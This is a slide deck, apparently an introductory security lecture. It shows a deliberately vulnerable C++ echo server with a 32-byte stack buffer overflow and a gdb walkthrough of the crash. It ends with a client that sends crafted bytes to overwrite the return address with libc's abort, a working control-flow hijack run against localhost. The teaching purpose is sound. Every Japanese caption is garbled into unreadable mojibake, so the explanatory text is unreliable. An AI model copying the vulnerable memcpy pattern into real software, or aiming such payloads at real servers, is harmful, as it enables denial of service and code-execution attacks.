Slide 1
Slide 1 text
ηΩϡϦςΟೖ
NAOMASA MATSUBAYASHI
Slide 2
Slide 2 text
ηΩϡϦςΟͷඪ
Slide 3
Slide 3 text
େࣄͳσʔλ
αʔό
ળྑͳϢʔβ
ѱҙ͋ΔϢʔβ
େࣄͳσʔλΛकΔ࠷؆୯Ͱ࣮֬ͳํ๏
ҰͷΞΫηεΛड͚͚ͳ͍ࣄͰ͋Δ
Slide 4
Slide 4 text
େࣄͳσʔλ
ળྑͳϢʔβ
ѱҙ͋ΔϢʔβ
αʔό
͔͠͠αʔόαʔϏεΛఏڙ͢ΔͨΊʹ
ϢʔβͷཁٻΛड͚͚ͳ͚ΕͳΒͳ͍
Slide 5
Slide 5 text
େࣄͳσʔλ
ળྑͳϢʔβ
ѱҙ͋ΔϢʔβ
αʔό
ҙਤͨ͠௨Γʹ͏ϢʔβΛड͚͚ͳ͕Β
ҙਤ͠ͳ͍͍ํΛ͢ΔϢʔβΛڋ൱͢Δඞཁ͕͋Δ
Slide 6
Slide 6 text
༏ΕͨηΩϡϦςΟͱ
ҙਤ͍ͨ͠ํͱ
ҙਤ͠ͳ͍͍ํΛ
ΑΓਖ਼֬ʹࣝผ͢Δ͜ͱ͕Ͱ͖Δࣄ
Slide 7
Slide 7 text
ҙਤ͠ͳ͍͍ํͱ
Slide 8
Slide 8 text
#include
#include
#include
namespace asio = boost::asio;
using boost::asio::ip::tcp;
using sock_p = std::shared_ptr< tcp::socket >;
using buf_p = std::shared_ptr< asio::streambuf >;
using error_type = boost::system::error_code;
struct session : public std::enable_shared_from_this< session > {
session( asio::io_service &io ) : sock( io ) {}
void read() {
boost::asio::async_read_until( sock, buf, '\n', boost::bind(
&session::check_on_read, shared_from_this(),
asio::placeholders::bytes_transferred, asio::placeholders::error
) );
}
void write( const char *data, size_t len ) {
boost::asio::async_write( sock, boost::asio::buffer( data, len ), boost::bind(
&session::check_on_write, shared_from_this(), asio::placeholders::error
) );
}
tcp::socket &get_socket() { return sock; }
private:
void check_on_read( size_t len, const error_type& e ) {
if( e && e != boost::asio::error::eof ) return;
on_read( len );
}
void on_read( size_t len ) {
char received[ 32 ];
std::memcpy( received, asio::buffer_cast( buf.data() ), len );
buf.consume( len );
https://wandbox.org/permlink/eucMJp4DkeLhnGlq
όάͷ͋ΔΤίʔαʔό
Slide 9
Slide 9 text
buf.consume( len );
received[ len ] = '\0';
write( received, len );
}
void check_on_write( const error_type& e ) {
if( e && e != boost::asio::error::eof ) return;
on_write();
}
void on_write() { read(); }
tcp::socket sock;
asio::streambuf buf;
};
struct server {
server( asio::io_service &io_ ) : io( io_ ), acc( io, tcp::endpoint( tcp::v4(), 20000 ) ) { accept(); }
void accept() {
std::shared_ptr< session > s( new session( io ) );
acc.async_accept( s->get_socket(), boost::bind( &server::on_accept, this, s, asio::placeholders::error ) );
}
private:
void on_accept( const std::shared_ptr< session > &s, const error_type& e ) {
if( !e ) s->read();
accept();
}
asio::io_service &io;
boost::asio::ip::tcp::acceptor acc;
};
int main() {
asio::io_service io;
server s( io );
io.run();
} https://wandbox.org/permlink/eucMJp4DkeLhnGlq
όάͷ͋ΔΤίʔαʔό
Slide 10
Slide 10 text
}
void on_read( size_t len ) {
char received[ 32 ];
std::memcpy( received, asio::buffer_cast( buf.data() ), len );
buf.consume( len );
received[ len ] = '\0';
write( received, len );
}
void check_on_write( const error_type& e ) {
if( e && e != boost::asio::error::eof ) return;
on_write();
}
void on_write() { read(); }
tcp::socket sock;
asio::streambuf buf;
};
struct server {
server( asio::io_service &io_ ) : io( io_ ), acc( io, tcp::endpoint( tcp::v4(), 20000 ) ) { accept(); }
void accept() {
std::shared_ptr< session > s( new session( io ) );
acc.async_accept( s->get_socket(), boost::bind( &server::on_accept, this, s, asio::placeholders::error ) );
}
private:
void on_accept( const std::shared_ptr< session > &s, const error_type& e ) {
if( !e ) s->read();
accept();
}
asio::io_service &io;
boost::asio::ip::tcp::acceptor acc;
};
int main() {
asio::io_service io;
https://wandbox.org/permlink/eucMJp4DkeLhnGlq
ݻఆ ௨৴Ͱड͚औͬͨσʔλ͕
ݻఆͷྻʹऩ·ΔαΠζͱݶΒͳ͍
ϦϞʔτ͔ΒόοϑΝΦʔόʔϥϯΛىͤ͜Δ
όάͷ͋ΔΤίʔαʔό
void on_read( size_t len ) {
char received[ 32 ];
std::memcpy( received, asio::buffer_cast( buf.data() ), len );
buf.consume( len );
received[ len ] = '\0';
write( received, len );
}
Slide 11
Slide 11 text
$ ./tiny_server
$ telnet localhost 20000
Trying ::1...
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
Hello, World!
Hello, World!
ૹ৴ͨ͠σʔλ όΠτ
ΫϥΠΞϯτ αʔό
ड৴ͨ͠σʔλ όΠτ
receivedͷαΠζʹऩ·͍ͬͯΔ߹ɺҙਤͨ͠ಈ͖Λ͍ͯ͠Δ
Slide 12
Slide 12 text
$ telnet localhost 20000
Trying ::1...
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
Hello, World! I would like to
crash this server. Blah blah
blah...
Hello, World! I would like to
crash this server. Blah blah
blah...
Connection closed by foreign
host.
ΫϥΠΞϯτ αʔό
$ ./tiny_server
Segmentation fault
αʔό͕ࢮΜͩ
Slide 13
Slide 13 text
߈ܸऀ͕αʔϏεΛར༻ෆೳʹͰ͖ΔࣄΛ
Denial of Service߈ܸ
ུͯ͠DoS߈ܸ͕Մೳͱݴ͏
Slide 14
Slide 14 text
ͱ͜ΖͰ͖ͬ͞ͷαʔό
ԿނࢮΜͩ
Slide 15
Slide 15 text
$ gdb -q tiny_server
Reading symbols from tiny_server...done.
(gdb) disas session::on_read
Dump of assembler code for function session::on_read(unsigned long):
…
0x000000000040a6c3 <+69>: callq 0x403340
0x000000000040a6c8 <+74>: mov -0x38(%rbp),%rax
…
(gdb) b *0x40a6c3
Breakpoint 1 at 0x40a6c3: file tiny_server.cpp, line 38.
(gdb) b *0x40a6c8
Breakpoint 2 at 0x40a6c8: file tiny_server.cpp, line 39.
(gdb) run
Starting program: /home/fadis/tiny_server
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib64/libthread_db.so.1".
Breakpoint 1, 0x000000000040a6c3 in session::on_read (this=0x632ef0, len=68) at
tiny_server.cpp:38
38 std::memcpy( received, asio::buffer_cast( buf.data() ), len );
(gdb) p &received
$1 = (char (*)[32]) 0x7fffffffd2c0
(gdb) x/40wx 0x7fffffffd2c0
0x7fffffffd2c0: 0xffffd380 0x00007fff 0x0040fe53 0x00000000
0x7fffffffd2d0: 0x006331b0 0x00000000 0x00000044 0x00000000
σόοΨͰαʔό͕ࢮΜͩॠؒΛݟͯΈΑ͏
Ͳ͜ʹ͕͋Δ͔طʹΘ͔͍ͬͯΔͷͰ
όοϑΝΦʔόʔϥϯΛҾ͖ى͜͢memcpyͷલޙͰ
ϒϨʔΫϙΠϯτΛு͓ͬͯ͘
Slide 16
Slide 16 text
Starting program: /home/fadis/tiny_server
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib64/libthread_db.so.1".
Breakpoint 1, 0x000000000040a6c3 in session::on_read (this=0x632ef0, len=68) at
tiny_server.cpp:38
38 std::memcpy( received, asio::buffer_cast( buf.data() ), len );
(gdb) p &received
$1 = (char (*)[32]) 0x7fffffffd2c0
(gdb) x/40wx 0x7fffffffd2c0
0x7fffffffd2c0: 0xffffd380 0x00007fff 0x0040fe53 0x00000000
0x7fffffffd2d0: 0x006331b0 0x00000000 0x00000044 0x00000000
0x7fffffffd2e0: 0x006331b0 0x00000000 0x00000044 0x00000000
0x7fffffffd2f0: 0xffffd340 0x00007fff 0x0040a674 0x00000000
0x7fffffffd300: 0x00000043 0x00000000 0xffffd5d0 0x00007fff
0x7fffffffd310: 0x00000044 0x00000000 0x00632ef0 0x00000000
0x7fffffffd320: 0xffffd340 0x00007fff 0x00412898 0x00000000
0x7fffffffd330: 0xffffd5c0 0x00007fff 0x00000044 0x00000000
0x7fffffffd340: 0xffffd380 0x00007fff 0x00411cdc 0x00000000
0x7fffffffd350: 0xffffd7b0 0x00007fff 0xffffd5d0 0x00007fff
(gdb) c
Continuing.
Breakpoint 2, session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:39
39 buf.consume( len );
(gdb) x/40wx 0x7fffffffd2c0
0x7fffffffd2c0: 0x6c6c6548 0x57202c6f 0x646c726f 0x20492021
0x7fffffffd2d0: 0x6c756f77 0x696c2064 0x7420656b 0x7263206f
0x7fffffffd2e0: 0x20687361 0x73696874 0x72657320 0x2e726576
ΫϥΠΞϯτ͔Βಧ͍ͨϝοηʔδΛ
receivedʹॻ͖ࠐΉલͷ
received͔Β256όΠτͷϝϞϦͷঢ়ଶ
receivedͷͨΊʹ֬อ͞Ε͍ͯΔ32όΠτ
Slide 17
Slide 17 text
0x7fffffffd320: 0xffffd340 0x00007fff 0x00412898 0x00000000
0x7fffffffd330: 0xffffd5c0 0x00007fff 0x00000044 0x00000000
0x7fffffffd340: 0xffffd380 0x00007fff 0x00411cdc 0x00000000
0x7fffffffd350: 0xffffd7b0 0x00007fff 0xffffd5d0 0x00007fff
(gdb) c
Continuing.
Breakpoint 2, session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:39
39 buf.consume( len );
(gdb) x/40wx 0x7fffffffd2c0
0x7fffffffd2c0: 0x6c6c6548 0x57202c6f 0x646c726f 0x20492021
0x7fffffffd2d0: 0x6c756f77 0x696c2064 0x7420656b 0x7263206f
0x7fffffffd2e0: 0x20687361 0x73696874 0x72657320 0x2e726576
0x7fffffffd2f0: 0x616c4220 0x6c622068 0x62206861 0x2e68616c
0x7fffffffd300: 0x0a0d2e2e 0x00000000 0xffffd5d0 0x00007fff
0x7fffffffd310: 0x00000044 0x00000000 0x00632ef0 0x00000000
0x7fffffffd320: 0xffffd340 0x00007fff 0x00412898 0x00000000
0x7fffffffd330: 0xffffd5c0 0x00007fff 0x00000044 0x00000000
0x7fffffffd340: 0xffffd380 0x00007fff 0x00411cdc 0x00000000
0x7fffffffd350: 0xffffd7b0 0x00007fff 0xffffd5d0 0x00007fff
(gdb) i r rsp rbp
rsp 0x7fffffffd2b0 0x7fffffffd2b0
rbp 0x7fffffffd2f0 0x7fffffffd2f0
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x000000000040a706 in session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:42
42 }
ΫϥΠΞϯτ͔Βಧ͍ͨϝοηʔδΛ
receivedʹॻ͖ࠐΜͩޙͷ
received͔Β256όΠτͷϝϞϦͷঢ়ଶ
receivedͷͨΊʹ֬อ͞Ε͍ͯΔ32όΠτ
Slide 18
Slide 18 text
0x7fffffffd320: 0xffffd340 0x00007fff 0x00412898 0x00000000
0x7fffffffd330: 0xffffd5c0 0x00007fff 0x00000044 0x00000000
0x7fffffffd340: 0xffffd380 0x00007fff 0x00411cdc 0x00000000
0x7fffffffd350: 0xffffd7b0 0x00007fff 0xffffd5d0 0x00007fff
(gdb) c
Continuing.
Breakpoint 2, session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:39
39 buf.consume( len );
(gdb) x/40wx 0x7fffffffd2c0
0x7fffffffd2c0: 0x6c6c6548 0x57202c6f 0x646c726f 0x20492021
0x7fffffffd2d0: 0x6c756f77 0x696c2064 0x7420656b 0x7263206f
0x7fffffffd2e0: 0x20687361 0x73696874 0x72657320 0x2e726576
0x7fffffffd2f0: 0x616c4220 0x6c622068 0x62206861 0x2e68616c
0x7fffffffd300: 0x0a0d2e2e 0x00000000 0xffffd5d0 0x00007fff
0x7fffffffd310: 0x00000044 0x00000000 0x00632ef0 0x00000000
0x7fffffffd320: 0xffffd340 0x00007fff 0x00412898 0x00000000
0x7fffffffd330: 0xffffd5c0 0x00007fff 0x00000044 0x00000000
0x7fffffffd340: 0xffffd380 0x00007fff 0x00411cdc 0x00000000
0x7fffffffd350: 0xffffd7b0 0x00007fff 0xffffd5d0 0x00007fff
(gdb) i r rsp rbp
rsp 0x7fffffffd2b0 0x7fffffffd2b0
rbp 0x7fffffffd2f0 0x7fffffffd2f0
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x000000000040a706 in session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:42
42 }
͜ͷҐஔʹվߦจࣈ͕ݟ͑ΔͨΊ
ྻͷऴΛ͑ͯ
͜͜·Ͱॻ͖ࠐΈ͕ߦΘΕͨ͜ͱ͕Θ͔Δ
receivedͷͨΊʹ֬อ͞Ε͍ͯΔ32όΠτ
Slide 19
Slide 19 text
(gdb) i r rsp rbp
rsp 0x7fffffffd2b0 0x7fffffffd2b0
rbp 0x7fffffffd2f0 0x7fffffffd2f0
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x000000000040a706 in session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:42
42 }
(gdb) backtrace
#0 0x000000000040a706 in session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:42
#1 0x2e68616c62206861 in ?? ()
#2 0x000000000a0d2e2e in ?? ()
#3 0x00007fffffffd5d0 in ?? ()
#4 0x0000000000000044 in ?? ()
#5 0x0000000000632ef0 in ?? ()
#6 0x00007fffffffd340 in ?? ()
#7 0x0000000000412898 in boost::get_pointer (
p=)
at /usr/include/boost/get_pointer.hpp:69
Backtrace stopped: Cannot access memory at address 0x6c622068616c4228
(gdb) disas
…
=> 0x000000000040a706 <+136>: retq
End of assembler dump.
(gdb)
Կॲ
࣮ߦΛଓ͚Δͱon_read͔Βreturnͨ͠ॴͰࢮ͵
όοΫτϨʔεΛݟΔͱon_read͕ฦΖ͏ͱͨ͠
ݺͼग़͠ݩͷؔͷΞυϨε͕͓͔͍͠
Slide 20
Slide 20 text
0x7fffffffd350: 0xffffd7b0 0x00007fff 0xffffd5d0 0x00007fff
(gdb) c
Continuing.
Breakpoint 2, session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:39
39 buf.consume( len );
(gdb) x/40wx 0x7fffffffd2c0
0x7fffffffd2c0: 0x6c6c6548 0x57202c6f 0x646c726f 0x20492021
0x7fffffffd2d0: 0x6c756f77 0x696c2064 0x7420656b 0x7263206f
0x7fffffffd2e0: 0x20687361 0x73696874 0x72657320 0x2e726576
0x7fffffffd2f0: 0x616c4220 0x6c622068 0x62206861 0x2e68616c
0x7fffffffd300: 0x0a0d2e2e 0x00000000 0xffffd5d0 0x00007fff
0x7fffffffd310: 0x00000044 0x00000000 0x00632ef0 0x00000000
0x7fffffffd320: 0xffffd340 0x00007fff 0x00412898 0x00000000
0x7fffffffd330: 0xffffd5c0 0x00007fff 0x00000044 0x00000000
0x7fffffffd340: 0xffffd380 0x00007fff 0x00411cdc 0x00000000
0x7fffffffd350: 0xffffd7b0 0x00007fff 0xffffd5d0 0x00007fff
(gdb) i r rsp rbp
rsp 0x7fffffffd2b0 0x7fffffffd2b0
rbp 0x7fffffffd2f0 0x7fffffffd2f0
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x000000000040a706 in session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:42
42 }
(gdb) backtrace
#0 0x000000000040a706 in session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:42
#1 0x2e68616c62206861 in ?? ()
#2 0x000000000a0d2e2e in ?? ()
͜ͷΞυϨε
͖ͬ͞ॻ͖ࠐΜͩϝοηʔδͷҰ෦ͩ
Slide 21
Slide 21 text
$16ͷߏ
CPU
rax rbx
rcx rdx
rsi rdi
rbp rsp
r8 r9
r10 r11
r12 r13
r14 r15
ࠓͷIntelϓϩηοαʹ
ܭࢉʹ͏ΛೖΕ͓ͯ͘ശ(Ϩδελ)͕
16ݸඋΘ͍ͬͯΔ
16ݸͰΓͳ͘ͳͬͨΒ
ࠓ͙͍͢Βͳ͍ΛϝϞϦʹҠͯ͠ϨδελΛۭ͚Δ
Slide 22
Slide 22 text
ελοΫ
CPU
rax rbx
rcx rdx
rsi rdi
rbp rsp
r8 r9
r10 r11
r12 r13
r14 r15
Ϩδελ͔Βୀආ͕ͨ͠ੵ·Ε͍ͯ͘
ୀආ͕ͨ͠࠶ͼඞཁʹͳͬͨΒ
্͔ΒऔΓग़͍ͯ͘͠
rdi͔ΒҠͨ͠
rax͔ΒҠͨ͠
rbp͔ΒҠͨ͠
rdi͔ΒҠͨ͠
͜ͷΑ͏ʹΘΕΔϝϞϦྖҬΛ
ελοΫͱݺͿ
Slide 23
Slide 23 text
ελοΫ
int f( int x, int y ) {
int i;
i = x * y;
return i;
}
͜ͷiͷΑ͏ͳϩʔΧϧม
ελοΫͷதʹஔ͔Ε͍ͯΔ
ଞͷม
ଞͷม
ଞͷม
i
ϩʔΧϧม͕࡞ΒΕΔͱελοΫʹ͕ੵ·Ε
είʔϓΛൈ͚ΔͱελοΫͷ͕ഁغ͞ΕΔ
Slide 24
Slide 24 text
int f( int i, int j ) {
return i + j;
}
int g() {
return f( 2, 3 );
}
ؔݺͼग़͠Λߦ͏ͱcallq໋ྩ͕ੜ͞ΕΔ
return͢Δͱretq໋ྩ͕ੜ͞ΕΔ
00000000004004b6 :
4004b6: 55 push %rbp
4004b7: 48 89 e5 mov %rsp,%rbp
4004ba: 89 7d fc mov %edi,-0x4(%rbp)
4004bd: 89 75 f8 mov %esi,-0x8(%rbp)
4004c0: 8b 55 fc mov -0x4(%rbp),%edx
4004c3: 8b 45 f8 mov -0x8(%rbp),%eax
4004c6: 01 d0 add %edx,%eax
4004c8: 5d pop %rbp
4004c9: c3 retq
00000000004004ca :
4004ca: 55 push %rbp
4004cb: 48 89 e5 mov %rsp,%rbp
4004ce: be 03 00 00 00 mov $0x3,%esi
4004d3: bf 02 00 00 00 mov $0x2,%edi
4004d8: e8 d9 ff ff ff callq 4004b6
4004dd: 5d pop %rbp
4004de: c3 retq
callqελοΫʹ
callqͷ࣍ͷΞυϨεΛੵΜͰ
ҾͰࢦఆ͞ΕͨΞυϨεʹඈͿ
retqελοΫͷઌ಄ʹੵ·Εͨ
ΞυϨεʹඈΜͰ
ελοΫͷઌ಄ͷΛࣺͯΔ
͜ͷΈ߹ΘͤͰ
ؔΛൈ͚ͨΒݩͷॴʹΔ
͕࣮ݱ͞Ε͍ͯΔ
Slide 25
Slide 25 text
ؔfͷม
ؔfͷม
ؔfͷม
ؔg͕ऴΘͬͨΒΔҐஔ
ؔgͷม
ؔgͷม
ؔh͕ऴΘͬͨΒΔҐஔ
ؔhͷม
ؔhͷม
ؔhͷม
ؔf͕ؔgΛݺΜͰ
ͦͷதͰؔh͕ݺΕ͍ͯΔ࣌ͷελοΫ
࣮ߦதͷؔʹͱͬͯͷ
ελοΫͷઌ಄ͱඌͷҐஔ$16ͷ
%rspϨδελͱ%rbpϨδελʹ
ه͞Ε͍ͯΔ
Slide 26
Slide 26 text
ؔfͷม
ؔfͷม
ؔfͷม
ؔg͕ऴΘͬͨΒΔҐஔ
ؔgͷม
ؔgͷม
ؔh͕ऴΘͬͨΒΔҐஔ
ؔhͷม
ؔhͷม
ؔhͷม
ؔcallq͞ΕͨΒ·ͣ
ݱࡏͷ%rbpΛελοΫʹੵΜͰ
%rbpΛ%rspʹ͢Δ
ͭ·Γݺͼग़͠ݩͷؔͷελοΫͷઌ಄Λ
͜Ε͔Β࣮ߦ͢ΔؔͷελοΫͷඌʹ͢Δ
ؔfͷSCQ
ؔgͷSCQ
͔ؔΒretq͢Δલʹ
%rbpΛελοΫͷઌ಄ͷʹͯ͠
ελοΫͷઌ಄ͷΛഁغ͢Δ
Slide 27
Slide 27 text
00000000004004b6 :
4004b6: 55 push %rbp
4004b7: 48 89 e5 mov %rsp,%rbp
4004ba: 89 7d fc mov %edi,-0x4(%rbp)
4004bd: 89 75 f8 mov %esi,-0x8(%rbp)
4004c0: 8b 55 fc mov -0x4(%rbp),%edx
4004c3: 8b 45 f8 mov -0x8(%rbp),%eax
4004c6: 01 d0 add %edx,%eax
4004c8: 5d pop %rbp
4004c9: c3 retq
00000000004004ca :
4004ca: 55 push %rbp
4004cb: 48 89 e5 mov %rsp,%rbp
4004ce: be 03 00 00 00 mov $0x3,%esi
4004d3: bf 02 00 00 00 mov $0x2,%edi
4004d8: e8 d9 ff ff ff callq 4004b6
4004dd: 5d pop %rbp
4004de: c3 retq
SCQΛελοΫʹੵΉ
SCQΛSTQͷʹ͢Δ
SCQΛελοΫͷʹ͢Δ
ελοΫʹॻ͔ΕͨΞυϨεʹΔ
͜ͷล͕ؔͷॲཧͷຊମ
Slide 28
Slide 28 text
(gdb) run
Starting program: /home/fadis/tiny_server
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib64/libthread_db.so.1".
Breakpoint 1, 0x000000000040a6c3 in session::on_read (this=0x632ef0, len=68) at
tiny_server.cpp:38
38 std::memcpy( received, asio::buffer_cast( buf.data() ), len );
(gdb) p &received
$1 = (char (*)[32]) 0x7fffffffd2c0
(gdb) x/40wx 0x7fffffffd2c0
0x7fffffffd2c0: 0xffffd380 0x00007fff 0x0040fe53 0x00000000
0x7fffffffd2d0: 0x006331b0 0x00000000 0x00000044 0x00000000
0x7fffffffd2e0: 0x006331b0 0x00000000 0x00000044 0x00000000
0x7fffffffd2f0: 0xffffd340 0x00007fff 0x0040a674 0x00000000
0x7fffffffd300: 0x00000043 0x00000000 0xffffd5d0 0x00007fff
0x7fffffffd310: 0x00000044 0x00000000 0x00632ef0 0x00000000
0x7fffffffd320: 0xffffd340 0x00007fff 0x00412898 0x00000000
0x7fffffffd330: 0xffffd5c0 0x00007fff 0x00000044 0x00000000
0x7fffffffd340: 0xffffd380 0x00007fff 0x00411cdc 0x00000000
0x7fffffffd350: 0xffffd7b0 0x00007fff 0xffffd5d0 0x00007fff
(gdb) c
Continuing.
Breakpoint 2, session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:39
39 buf.consume( len );
(gdb) x/40wx 0x7fffffffd2c0
0x7fffffffd2c0: 0x6c6c6548 0x57202c6f 0x646c726f 0x20492021
0x7fffffffd2d0: 0x6c756f77 0x696c2064 0x7420656b 0x7263206f
͔͜͜Β্͕
on_readͷελοΫ
(gdb) i r rsp rbp
rsp 0x7fffffffd2b0 0x7fffffffd2b0
rbp 0x7fffffffd2f0 0x7fffffffd2f0
on_readʹுͬͨϒϨʔΫϙΠϯτͰͷ
%rbpͱ%rspͷ
on_readΛݺͼग़ͨؔ͠ͷ%rbp
on_read͕returnͨ͠ࡍʹඈͿઌͷΞυϨε
όοϑΝΦʔόʔϥϯલ
Slide 29
Slide 29 text
0x7fffffffd310: 0x00000044 0x00000000 0x00632ef0 0x00000000
0x7fffffffd320: 0xffffd340 0x00007fff 0x00412898 0x00000000
0x7fffffffd330: 0xffffd5c0 0x00007fff 0x00000044 0x00000000
0x7fffffffd340: 0xffffd380 0x00007fff 0x00411cdc 0x00000000
0x7fffffffd350: 0xffffd7b0 0x00007fff 0xffffd5d0 0x00007fff
(gdb) c
Continuing.
Breakpoint 2, session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:39
39 buf.consume( len );
(gdb) x/40wx 0x7fffffffd2c0
0x7fffffffd2c0: 0x6c6c6548 0x57202c6f 0x646c726f 0x20492021
0x7fffffffd2d0: 0x6c756f77 0x696c2064 0x7420656b 0x7263206f
0x7fffffffd2e0: 0x20687361 0x73696874 0x72657320 0x2e726576
0x7fffffffd2f0: 0x616c4220 0x6c622068 0x62206861 0x2e68616c
0x7fffffffd300: 0x0a0d2e2e 0x00000000 0xffffd5d0 0x00007fff
0x7fffffffd310: 0x00000044 0x00000000 0x00632ef0 0x00000000
0x7fffffffd320: 0xffffd340 0x00007fff 0x00412898 0x00000000
0x7fffffffd330: 0xffffd5c0 0x00007fff 0x00000044 0x00000000
0x7fffffffd340: 0xffffd380 0x00007fff 0x00411cdc 0x00000000
0x7fffffffd350: 0xffffd7b0 0x00007fff 0xffffd5d0 0x00007fff
(gdb) i r rsp rbp
rsp 0x7fffffffd2b0 0x7fffffffd2b0
rbp 0x7fffffffd2f0 0x7fffffffd2f0
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x000000000040a706 in session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:42
͔͜͜Β্͕
on_readͷελοΫ
(gdb) i r rsp rbp
rsp 0x7fffffffd2b0 0x7fffffffd2b0
rbp 0x7fffffffd2f0 0x7fffffffd2f0
on_readʹுͬͨϒϨʔΫϙΠϯτͰͷ
%rbpͱ%rspͷ
on_readΛݺͼग़ͨؔ͠ͷ%rbp
on_read͕returnͨ͠ࡍʹඈͿઌͷΞυϨε
όοϑΝΦʔόʔϥϯޙ
returnΞυϨε͕ॻ͖Θͬͯ͠·ͬͨ
Slide 30
Slide 30 text
#1 0x2e68616c62206861 in ?? ()
#2 0x000000000a0d2e2e in ?? ()
returnΞυϨε͕ॻ͖Θͬͨঢ়ଶͰretqͨ݁͠Ռ
ΞυϨε͕ࢦ͢ઌͷϝϞϦʹΞΫηεͰ͖ͳ͔ͬͨҝ
ൣғ֎ࢀরͰϓϩηε͕ఀࢭͨ͠
όοϑΝΦʔόʔϥϯʹΑͬͯ
ྻreceivedͷઌʹஔ͍ͯ͋ͬͨ
returnΞυϨε͕ॻ͖͑ΒΕͯ͠·ͬͨ
Slide 31
Slide 31 text
ॻ͖͑ΒΕͨΞυϨε͕
ΞΫηεՄೳͩͬͨΒ
Կ͕ى͍ͬͯͨ͜
Slide 32
Slide 32 text
#include
#include
int main() {
namespace asio = boost::asio;
using boost::asio::ip::tcp;
asio::io_service io_service;
tcp::socket socket(io_service);
socket.connect( tcp::endpoint( asio::ip::address::from_string("127.0.0.1"), 20000 ) );
std::vector< uint8_t > data {
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xb0, 0x31, 0x63, 0x00, 0x00, 0x00, 0x00, 0x00,
0x42, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xe0, 0x24, 0xf6, 0xf6, 0xff, 0x7f, 0x00, 0x00,
0x0d, 0x0a,
};
boost::system::error_code error;
asio::write(socket, asio::buffer(data), error);
return 0;
if( !error ) {
asio::streambuf receive_buffer;
asio::read_until(socket, receive_buffer, '\n', error);
std::cout << asio::buffer_cast(receive_buffer.data()) << std::endl;
}
}
ࡉͨ͠σʔλΛૹΔΫϥΠΞϯτ
Slide 33
Slide 33 text
#include
#include
int main() {
namespace asio = boost::asio;
using boost::asio::ip::tcp;
asio::io_service io_service;
tcp::socket socket(io_service);
socket.connect( tcp::endpoint( asio::ip::address::from_string("127.0.0.1"), 20000 ) );
std::vector< uint8_t > data {
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xb0, 0x31, 0x63, 0x00, 0x00, 0x00, 0x00, 0x00,
0x42, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xe0, 0x24, 0xf6, 0xf6, 0xff, 0x7f, 0x00, 0x00,
0x0d, 0x0a,
};
boost::system::error_code error;
asio::write(socket, asio::buffer(data), error);
return 0;
if( !error ) {
asio::streambuf receive_buffer;
asio::read_until(socket, receive_buffer, '\n', error);
std::cout << asio::buffer_cast(receive_buffer.data()) << std::endl;
}
}
(gdb) disas abort
Dump of assembler code for function abort:
0x00007ffff6f624e0 <+0>: sub $0x128,%rsp
0x00007ffff6f624e7 <+7>: mov %fs:0x10,%rdx
…
Cݴޠඪ४ϥΠϒϥϦͷabortؔͷΞυϨε͕
ελοΫͷreturnΞυϨεͷҐஔʹདྷΔΑ͏ʹ
αʔόʹૹΔσʔλΛ࡞Δ
Slide 34
Slide 34 text
$ ./pktgen
ΫϥΠΞϯτ αʔό
$ gdb -q ./tiny_server
Reading symbols from ./tiny_server...done.
(gdb) run
Starting program: /home/fadis/tiny_server
[Thread debugging using libthread_db
enabled]
Using host libthread_db library "/lib64/
libthread_db.so.1".
Program received signal SIGABRT, Aborted.
0x00007ffff6f61228 in raise () from /
lib64/libc.so.6
(gdb) backtrace
#0 0x00007ffff6f61228 in raise () from /
lib64/libc.so.6
#1 0x00007ffff6f6264a in abort () from /
lib64/libc.so.6
#2 0x0000000000000a0d in ?? ()
#3 0x00007fffffffd5d0 in ?? ()
SIGSEGVͰͳ͘SIGABRTͰαʔό͕ఀࢭͨ͠
Slide 35
Slide 35 text
Program received signal SIGABRT, Aborted.
0x00007ffff6f61228 in raise () from /
lib64/libc.so.6
(gdb) backtrace
#0 0x00007ffff6f61228 in raise () from /
lib64/libc.so.6
#1 0x00007ffff6f6264a in abort () from /
lib64/libc.so.6
#2 0x0000000000000a0d in ?? ()
#3 0x00007fffffffd5d0 in ?? ()
#4 0x0000000000000042 in ?? ()
#5 0x0000000000632ef0 in ?? ()
#6 0x00007fffffffd340 in ?? ()
#7 0x0000000000412898 in
boost::get_pointer (
p=)
at /usr/include/boost/get_pointer.hpp:
69
Backtrace stopped: previous frame inner to
this frame (corrupt stack?)
αʔόͷίʔυ্Ͱ
ݺΜͰ͍ͳ͍
abort͕ؔ
ݺΕͨ͜ͱʹͳ͍ͬͯΔ
Slide 36
Slide 36 text
